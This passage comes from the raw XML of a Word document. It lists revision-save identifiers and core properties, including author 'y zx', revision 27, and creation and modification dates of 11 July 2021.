    </w:p>
    <w:sectPr w:rsidR="0097247C" w:rsidRPr="00CF6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CA"/>
    <w:rsid w:val="00034B0F"/>
    <w:rsid w:val="00160E66"/>
    <w:rsid w:val="0023590D"/>
    <w:rsid w:val="0025650D"/>
    <w:rsid w:val="002648EB"/>
    <w:rsid w:val="00384943"/>
    <w:rsid w:val="003C1D4D"/>
    <w:rsid w:val="003E3B37"/>
    <w:rsid w:val="004A6DDA"/>
    <w:rsid w:val="005168D7"/>
    <w:rsid w:val="00552A8C"/>
    <w:rsid w:val="0067766E"/>
    <w:rsid w:val="00745A68"/>
    <w:rsid w:val="007F7D81"/>
    <w:rsid w:val="00846F91"/>
    <w:rsid w:val="00852F5A"/>
    <w:rsid w:val="0089608D"/>
    <w:rsid w:val="00932D26"/>
    <w:rsid w:val="00971A38"/>
    <w:rsid w:val="0097247C"/>
    <w:rsid w:val="00B93C82"/>
    <w:rsid w:val="00BC003C"/>
    <w:rsid w:val="00BE4716"/>
    <w:rsid w:val="00C50848"/>
    <w:rsid w:val="00C77A68"/>
    <w:rsid w:val="00CB2E48"/>
    <w:rsid w:val="00CB7B45"/>
    <w:rsid w:val="00CC2779"/>
    <w:rsid w:val="00CF68CA"/>
    <w:rsid w:val="00D1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B3F8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7D9B1C88-20FF-4410-81B2-D64F9047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zx</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>y zx</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-11T08:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>